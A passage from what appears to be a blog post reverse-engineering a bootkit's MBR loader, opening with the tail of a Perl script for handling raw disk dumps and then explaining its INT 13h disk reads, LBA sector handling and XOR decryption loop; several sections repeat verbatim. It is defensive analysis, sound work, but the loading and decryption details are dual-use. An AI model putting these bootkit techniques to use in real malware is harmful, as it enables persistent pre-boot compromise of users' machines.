}
#Imprime el arreglo que contiene el raw file en el file system.
#Param 1: Arreglo que contiene el raw file
sub write_file(){
my @final = @_;
open (FILE2,">testiculo.bin") or die $!;
binmode(FILE2);
for my $n (0 .. $#final){
print FILE2 sprintf("%c", hex($final[$n]) );
}
close (FILE2);
}
sub load_file(){
open(FILE, "<$file") or die $!;
binmode(FILE);
undef($main);
my $char = "";
my $i =0;
while (1) {
$char = getc(FILE);
$main[$i] = sprintf("%02x", ord($char));
if (eof(FILE)){
$fin = $i;#Saving the length of the file.
last;
}
$i +=1;
}
close(FILE);
}
#END of Script
Understanding decrypted code:
Next step is to understand what the decrypted code is going to do, as per Kasperky blog: "The main function of the MBR loader, which is small in size, is to search the rootkit’s encrypted partition for the ldr16 component, load it into RAM and pass control to it."
But again, let's analyze this "gray area" since there are many internal steps before taking above conclusion.
The main feature to understand here is the interruption 13h or INT 13 which basically uses different functions to read, write, lock, unlock, eject, etc, hard disks and removable media. There are two types of int 13h: 1. The legacy INT 13
- Which was designed in the early 1980's.
- The maximum theoretical capacity (disk size) of this API is 8.4 GB.
- Uses function numbers 1-15h and Cylinder-Head-Sector (CHS) oriented.
- Replace CHS addressing with Logical Block Addressing (LBA).
- Give the BIOS better control over how this data is used.
- Uses functions numbers 41h-48h.
- It uses a data structure called "Disk Address Packet".
We will concentrate our analysis in the second option, the Extended INT 13 interface since our Malware uses the options 42h and 48h to commit its malicious actions.
The article "Enhanced Disk Drive Specification (EDDS)" details all the futures of this interface, as well as the "Disk Address Packet" structure mentioned above. Moving forward, let's analyze the first chunk of the decrypted data, basically, you will notice that the INT 13 is being called with the extension passed via AH register, in this case 48h, which means, Get the Drive Parameters. See image below:
Extension 48h - Get Driver parameters:003C -
AH is set to the extension number required, in this case 48h.
:003E - Offset in memory to store the result buffer. The result buffer is were all the parameters of the hard disk will be stored and it is explained in detail in the EDDS article.
:0041 - Maximum buffer size: Located at offset 0 (86Fh).
As explained above, the result buffer will be loaded starting at memory offset 86Fh. Sixteen bytes ahead of this offset (at 87Fh) is located the 8-byte value of the number of sectors of the disk, by reviewing the memory dump of the affected system, we confirm that this value is: 9502F90, as shown below:
AH is set to the extension number required, in this case 48h.
:003E - Offset in memory to store the result buffer. The result buffer is were all the parameters of the hard disk will be stored and it is explained in detail in the EDDS article.
:0041 - Maximum buffer size: Located at offset 0 (86Fh).
As explained above, the result buffer will be loaded starting at memory offset 86Fh. Sixteen bytes ahead of this offset (at 87Fh) is located the 8-byte value of the number of sectors of the disk, by reviewing the memory dump of the affected system, we confirm that this value is: 9502F90, as shown below:
But, wait a second, why does the Malware need the hard disk parameters?
Response: The total number of sectors of the hard disk is going to be a parameter used by the INT 13 extension 42h to know the last sector to be loaded in memory! See next section for more details.
Response: The total number of sectors of the hard disk is going to be a parameter used by the INT 13 extension 42h to know the last sector to be loaded in memory! See next section for more details.
So, let's analyze the INT 13 with the extension 42h, which means, load data from disk into memory.
Decryption Process - Function sub_76 Extension 42h - Load disk data into memory
The function sub_76 (name represented by IDA) contains the logic to the decrypt the sectors stored in the hard disk, as an overview, the main steps of this function are shown below:
Decryption Process - Function sub_76 Extension 42h - Load disk data into memory
The function sub_76 (name represented by IDA) contains the logic to the decrypt the sectors stored in the hard disk, as an overview, the main steps of this function are shown below:
- Load next sector from disk to memory.
- Decrypt the sector loaded (via XOR function).
- Copy the decrypted chunk to another section in memory.
- Is this the last sector to be copied? if no, go to point 1.
- If yes, jump to offset of the decrypted code in memory.
You will need to check the EDDS article to understand the parameters required for this extension.
Note: To help in your calculations, DS = 0.
Code explanation:
007C: Number of sectors to transfer. It is set at offset 2 of the Device packet driver which corresponds to offset 861h in memory.
0086: Address of Transfer buffer: Address where the sector will be loaded in memory: 88Dh.
008C - 009B - Starting logical block address - LBA: The sector from disk to be loaded. The 8-byte-syze address is copied from offset 87Fh to 867h in memory via push and pop instructions.
By looking at the memory dump we found this LBA value: 000009502F59 at offset 8, but that does not mean this is the only one, actually, my assumption is that this is the last one copied from disk to memory (we confirmed this below), keep in mind the Malware will load different sectors from disk to memory.
So, as explained above (see section 2.1), we confirmed that the last sector of the hard disk is the first one loaded in memory, in our case the value is: 9502F90 hex = 156250000 dec.
00A2: Every time a sector is going to be loaded in memory, the total number of sectors is reduced by EAX times (1, 2, 3 and so on), this way, some sectors from the disk (starting from the final one) are copied to memory in every loop.
00A7: The 4 Higher bits of the LBA address are subtracted by 1 in case there is negative number: The sbb instruction is used since we are dealing with 16 bit registers and therefore we need to take care of the borrow when a negative number is reached.
To better understand this, See below example:
AH = 876D
AL= 0000
If AL is subtracted by 1 it will generate a borrow.
AL = 0000 - 0001 = FFFF; Since this generates a borrow, AH needs to be subtracted by one
AH = 876D - 1 = 876C or sbb AH, 0
Final result : 876CFFFF - Got it????????
In our code shown in the figure above, the four higher bits start at offset 86B since it is in little-endian order.
00AF: - The int 13h will use a structure called "Device Address Packet" which its offset is at DS:SI in memory. Here we can see the offset is at 85Fh.
Quick note:
a) Number of bytes per sector of your hard disk: Can be found by looking at hard disk properties (you can use the linux command dmesg to get this info) in our case this value is 512 bytes per sector. b) Number of sectors per disk: via dmesg command or: total bytes of hard disk / 512.
NOTE - LBA:
"With LBA, instead of referring to a drives cylinder, head and sector number geometry in order to access or "address" it, each sector is assigned a unique "sector number". In essence, LBA is a means by which a drive is accessed by linearly addressing sector addresses, beginning at sector 1 of head 0, cylinder 0 as LBA 0, and proceeding on in sequence to the last physical sector on the drive, which, for instance, on a standard 540 Meg drive would be LBA 1,065,456." by http://www.dewassoc.com/kbase/hard_drives/lba.htm
Below is the memory dump showing the confirmation of the new values identified:
Note: To help in your calculations, DS = 0.
Code explanation:
007C: Number of sectors to transfer. It is set at offset 2 of the Device packet driver which corresponds to offset 861h in memory.
0086: Address of Transfer buffer: Address where the sector will be loaded in memory: 88Dh.
008C - 009B - Starting logical block address - LBA: The sector from disk to be loaded. The 8-byte-syze address is copied from offset 87Fh to 867h in memory via push and pop instructions.
By looking at the memory dump we found this LBA value: 000009502F59 at offset 8, but that does not mean this is the only one, actually, my assumption is that this is the last one copied from disk to memory (we confirmed this below), keep in mind the Malware will load different sectors from disk to memory.
So, as explained above (see section 2.1), we confirmed that the last sector of the hard disk is the first one loaded in memory, in our case the value is: 9502F90 hex = 156250000 dec.
00A2: Every time a sector is going to be loaded in memory, the total number of sectors is reduced by EAX times (1, 2, 3 and so on), this way, some sectors from the disk (starting from the final one) are copied to memory in every loop.
00A7: The 4 Higher bits of the LBA address are subtracted by 1 in case there is negative number: The sbb instruction is used since we are dealing with 16 bit registers and therefore we need to take care of the borrow when a negative number is reached.
To better understand this, See below example:
AH = 876D
AL= 0000
If AL is subtracted by 1 it will generate a borrow.
AL = 0000 - 0001 = FFFF; Since this generates a borrow, AH needs to be subtracted by one
AH = 876D - 1 = 876C or sbb AH, 0
Final result : 876CFFFF - Got it????????
In our code shown in the figure above, the four higher bits start at offset 86B since it is in little-endian order.
00AF: - The int 13h will use a structure called "Device Address Packet" which its offset is at DS:SI in memory. Here we can see the offset is at 85Fh.
Quick note:
a) Number of bytes per sector of your hard disk: Can be found by looking at hard disk properties (you can use the linux command dmesg to get this info) in our case this value is 512 bytes per sector. b) Number of sectors per disk: via dmesg command or: total bytes of hard disk / 512.
NOTE - LBA:
"With LBA, instead of referring to a drives cylinder, head and sector number geometry in order to access or "address" it, each sector is assigned a unique "sector number". In essence, LBA is a means by which a drive is accessed by linearly addressing sector addresses, beginning at sector 1 of head 0, cylinder 0 as LBA 0, and proceeding on in sequence to the last physical sector on the drive, which, for instance, on a standard 540 Meg drive would be LBA 1,065,456." by http://www.dewassoc.com/kbase/hard_drives/lba.htm
Below is the memory dump showing the confirmation of the new values identified:
Something to keep in mind is that the LBA address found at memory was 09502F59 and the last sector is 09502F90, this could be the range copied (backwards) from disk to memory, we will confirm this later. Quick tip-Getting sectors with dd tool:
dd if=/dev/sdb bs=512 skip=156249944 count = 2 >out Where 156249944d = 09502F59h the block detected in memory
Decrypt the sector loaded (via XOR function)
Once the encrypted sectors has been loaded in memory, the funny part begins, which is the code related to the decryption process as shown below:
00C4: The code will zero out all the bytes starting at offset 75D and until 85C, why only FFh (255 bytes)? because the loop is calculated based on BL register which is 8-bytes length and therefore after FFh the next value is 100 (BH=01 , BL=00) which sets bl to 0 and the loop ends. From 00CC to 00ED the same range (75D - 85C) is set with different values based on multiple calculations.
Decryption loop:
In the first two instructions of below code we can see that since the last byte affected by previous code (see above) was at offset 85C, now, the next byte to be change is at offset 85D and then 85E, this shows how the bootkit is preparing the proper bytes to be used during decryption process.
The decryption loop starts at offset 0109, some calculations are performed to calculate the encryption key, which is going to be stored at register CL, and finally at instruction 012B the XOR function is executed against the content where SI is pointing to which is (see above) the offset 88D where the first byte from disk was loaded. A sector of 512 bytes is going to be decrypted as expected, we can confirm this by checking the value of register DX which is the counter of this loop and is set to 200h (512 bytes) at the instruction 00FA.
Jumping to the decrypted code in Memory
Once all the sectors loaded from disk have been decrypted in memory, it is time to jump to the new instructions. In the code below we can see two important things:
1. 060 - 067: Decrypted code is being moved from SI (893h) to DI (calculated at runtime) CX number of times. Here is where decrypted code is being loaded into memory, this step happens every time one sector has been decrypted.
2. 069 - 071: The value at offset 891h in memory will call the decryption function if more sectors need to be decrypted, otherwise will jump to the decrypted code in memory.
Next Steps
The next step will be to create a perl script to decrypt the hard disk sectors and come up with the next set of instructions. Specifically, we will be analyzing how the INT 13 Hooking is being implemented!!!! and how the malicious kernel-level drivers are loaded before the OS starts.
Currently I am swamped with other stuff but I will try to dedicate some hours in the near future. Meanwhile, please share any thoughts.
Thanks.
Subscribe to:
Posts (Atom)